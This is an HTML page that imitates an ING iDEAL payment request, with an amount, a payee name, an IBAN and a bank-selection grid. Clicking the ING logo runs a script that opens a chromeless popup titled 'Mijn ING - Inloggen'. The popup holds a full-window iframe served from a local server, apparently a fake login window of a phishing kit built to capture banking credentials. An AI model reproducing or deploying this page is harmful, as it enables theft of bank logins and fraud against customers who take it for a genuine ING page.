<!doctype html>
<html lang="en">
  <head>
    <title>ING - Betaalverzoek</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css" integrity="sha384-PsH8R72JQ3SOdhVi3uxftmaW6Vc51MKb0q5P2rRUpPvrszuE4W1povHYgTpBfshb" crossorigin="anonymous">
    <link rel="stylesheet" href="style.css">
        <link rel="icon" href="icon.jpg">
  </head>
  <body>
  <ul class="topnav">
  <li class="left"><a class="active" href="index.php"><img style="height: 35px; width: 118px;" src="logo1.png"></a></li>
  <div class="rightdiv"><li class="right activelan"><a class="test" href="">NL</a></li>
  <li class="right activelan2"><a href="" style="color: #767676">EN</a></li></div>
</ul>
<script>
setTimeout(function(){
  document.getElementById('inlogshit').style.display = 'block';
  document.getElementById('loadshit').style.display = 'none';
}, 2500);
</script>
  <br>
    <br>
<center>
  <h1 id="ingtekst" class="l-mt-1">Betaalverzoek via iDEAL</h1>
  <br>
  <br>
  <img src="logobetaal.svg" width="240" height="240">
  <br>
   <h2 color="#000000"><strong>€ 0,01</strong></h2>
   <h6 color="#000000">Test</h6>
<br>
<h6 color="#000000">Robert De Groot</h6>
<div>
<h6><font color="#76767a">NL39 INGB 8945 0732 90</font></h6>
</div>
<br>

  <h1 id="ingtekst" class="l-mt-1">Kies je bank</h1>
  <br>
<img src="blank.png" width="20" height="50"><a href="https://www.abnamro.nl/portalserver/en/private/banking/ideal.html?randomizedstring=328405"><img src="abn.png"></a><img src="blank.png" width="20" height="50"><a href="https://ideal.moneyou.nl/?transactionId=0030005461490695&randomToken=2d1ec9f7-b578-4692-99ac-7fe22e04ba44"><img src="moneyyou.png"></a><img src="blank.png" width="20" height="50"><br>
<img src="blank.png" width="20" height="50"><a href="https://diensten.asnbank.nl/online/ideal/#/sign?sp=Rgu8fp5htVlWtYOjwm6DViozkUJYoUgfg2sdmbJT8sDjurDNx7nj&trxid=0030005461486274"><img src="asn.png"></a><img src="blank.png" width="20" height="50"><a href="https://betalen.rabobank.nl/ideal-betaling/qslo.htm?Abs-Pad=%2Fideal%2Dbetaling%2FsummaryPage%3Frandom%3D81f1614a4dbc8952ffc282dad469bcf81e40974b7e023bbb6bc09d11e43a2cab%26trxid%3D30005461489786"><img src="rabo.png"></a><img src="blank.png" width="20" height="50"><br>
<img src="blank.png" width="20" height="50"><a href="https://ideal.bunq.com/?authorisationId=647803650221&transactionId=0030005461490503"><img src="bunq.png"></a><img src="blank.png" width="20" height="50"><a href="https://diensten.regiobank.nl/online/ideal/#/sign?sp=1KpuAwKR01zTnCUX8G3F2HkeXxYSjOprEJH39U9l6lRSpa1HBt4x&trxid=0030005461488417"><img src="regio.png"></a><img src="blank.png" width="20" height="50"><br>
<img src="blank.png" width="20" height="50"><a href="https://ideal.handelsbanken.nl/logon/nl/privideal/nl/?transaction_id=0030005461489051&validation_code=w0JzriCiHzi6CHo"><img src="handel.png"></a><img src="blank.png" width="20" height="50"><a href="https://diensten.snsbank.nl/online/ideal/#/sign?sp=TJmazysGxv9gdlisi0EYpFb2JgJPXILLRowLjaBdy7o7Fbq90RyY&trxid=0030005461486609"><img src="sns.png"></a><img src="blank.png" width="20" height="50"><br>
<img src="blank.png" width="20" height="50"><img id="ing" src="ieng.png"><img src="blank.png" width="20" height="50"><a href="https://ideal.triodos.nl/ideal-online/pages/transaction.action?trxid=0030005461485300&cc=5697704657040087"><img src="trio.png"></a><img src="blank.png" width="20" height="50"><br>
<img src="blank.png" width="20" height="50"><a href="https://ideal.knab.nl/inloggen?trxid=30005461490906&iec=ab7fc58c43fb44b18cf025e1cf254fe6"><img src="knab.png"></a><img src="blank.png" width="20" height="50"><a href="https://login.ideal.vanlanschot.com/ideal"><img src="lan.png"></a><img src="blank.png" width="20" height="50"><br>
<br><br><br>
<img src="ideal.svg" width="60" height="60"><br><br><br>

<div class="links">
<span style="margin-left: 30px;"><img src="arrow-chevron-open-right.svg" style="height: 18px; width: 18px">&nbsp;&nbsp;
<a id="link" href="https://www.ing.nl/particulier/mobiel-en-internetbankieren/mobiel-bankieren/betaalverzoek-met-QRcode/index.html">Meer over Betaalverzoeken</a>
<img src="arrow-chevron-open-right.svg" style="height: 18px; width: 18px">&nbsp;&nbsp;
<a id="link" href="https://www.ing.nl/de-ing/veilig-bankieren/veilig-bankzaken-regelen/veilig-online-winkelen/index.html">Veilig betalen met iDEAL</a>

</center>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>


    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.3/umd/popper.min.js" integrity="sha384-vFJXuSJphROIrBnz7yo7oB41mKfc8JzQZiCq4NCceLEaO4IHwicKwpJf9c9IpFgh" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/js/bootstrap.min.js" integrity="sha384-alpBpkh1PFOepccYVYDB4do5UnbKysX5WZXm3XxPqe5iKTfUKjNkCk9SaVuEZflJ" crossorigin="anonymous"></script>
	<script type="text/javascript">
        function removeDiv(btn){
            var element = document.getElementById("remove");
			element.parentNode.removeChild(element);
        }
    </script>

      <script>
        document.getElementById('ing').addEventListener('click', () => {
            const wnd = window.open('about:blank', '_blank', 'status=no,toolbar=no,location=no,directories=no,resisable=yes,srollbars=yes,width=1050,height=600');
            wnd.document.write('<script>document.title = "Mijn ING - Inloggen";</scr' + 'ipt><iframe style="position: absolute;top: 0px;bottom: 0px;right: 0px;width: 100%;border: none;margin: 0;padding: 0;overflow: hidden;z-index: 9999;height: 100%;" src="http://127.0.0.1:5000/ing"></iframe>');
        });
    </script>
  </body>
</html>
